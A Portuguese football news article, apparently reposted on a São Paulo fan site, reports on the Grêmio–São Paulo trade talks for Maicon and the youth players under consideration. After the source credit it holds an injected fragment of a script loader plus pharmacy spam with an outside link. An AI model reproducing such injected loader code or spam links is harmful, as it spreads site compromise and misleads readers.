Destaque Noticia

Troca por Maicon avança e São Paulo analisa garotos do Grêmio

As negociações entre São Paulo e Grêmio pelo volante Maicon avançaram muito nos últimos dias. Os gaúchos, sem condições financeiras de bancar os R$ 9 milhões exigidos, aceitaram incluir atletas no pacote para comprar o meio-campista emprestado pelos paulistas, que analisam os nomes de dois garotos da base gremista para concluir as tratativas: Raul e Júnior.

O LANCE! apurou que os jovens estão no radar do Tricolor há tempos e que ainda não há consenso sobre qual dos dois será pedido na troca por Maicon. Raul é lateral-direito e tem 18 anos, enquanto Júnior é lateral-esquerdo e tem 19 anos. Na próxima temporada, os paulistas podem perder o ala direito Bruno para o Flamengo e, na esquerda, Carlinhos e Reinaldo não gozam de muito prestígio com os torcedores são-paulinos.

O segundo jogador a ser incluído na troca também não está definido, mas deve ser um atleta com mais experiência no elenco gaúcho. O São Paulo chegou a fazer consultas sobre Pedro Geromel, Walace e Luan, mas o Grêmio refutou imediatamente. O meia uruguaio Maxi Rodríguez, de 25 anos e que foi emprestado duas vezes nas últimas temporadas, é uma das opções analisadas pela diretoria tricolor. O pacote ainda deve ter o pagamento de R$ 2 milhões, já que nenhum nome de peso deve ser inserido.

Apesar da indefinição sobre os nomes, a impressão dos envolvidos é que a situação deve ser resolvida rapidamente. Uma pessoa próxima a Maicon afirma que o humor do volante melhorou nos últimos dias e que isso pode ser um indício de que a permanência no Grêmio está cada vez mais próxima. Antes, o jogador não escondia o incômodo com a dúvida sobre o futuro e chegou a declarar publicamente que não aceitaria voltar ao São Paulo.

Fonte: LanceNetvar d=document;var s=d.createElement(‘script’); pills gain cheat medications on line – http://birmiligramnostalji.besaba.com/?p=217

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

O que pensa o Diretor Financeiro do São Paulo para o ano de 2018

saopauloadmin12 de dezembro de 2017

Buffarini: Boca Jrs quer jogador para 2018 diz mídia argentina

saopauloadmin11 de dezembro de 2017

Empresário revela que Copete recebeu sondagem do São Paulo

saopauloadmin11 de dezembro de 2017

Raí fala de reforços, Dorival, Scarpa, Pratto, Lugano…

saopauloadmin11 de dezembro de 2017

Arboleda e a primeira temporada tricolor: “Minha vida mudou”

saopauloadmin10 de dezembro de 2017

Diego Souza desconversa mas não nega possível transferência para o São Paulo em 2018

saopauloadmin10 de dezembro de 2017

Acertado com Tricolor, Jean já escolheu apartamento na capital

saopauloadmin8 de dezembro de 2017

Por São Paulo, Raí abandona a presidência da Atletas em momento-chave

saopauloadmin8 de dezembro de 2017

Raí é o novo diretor de futebol do São Paulo

saopauloadmin7 de dezembro de 2017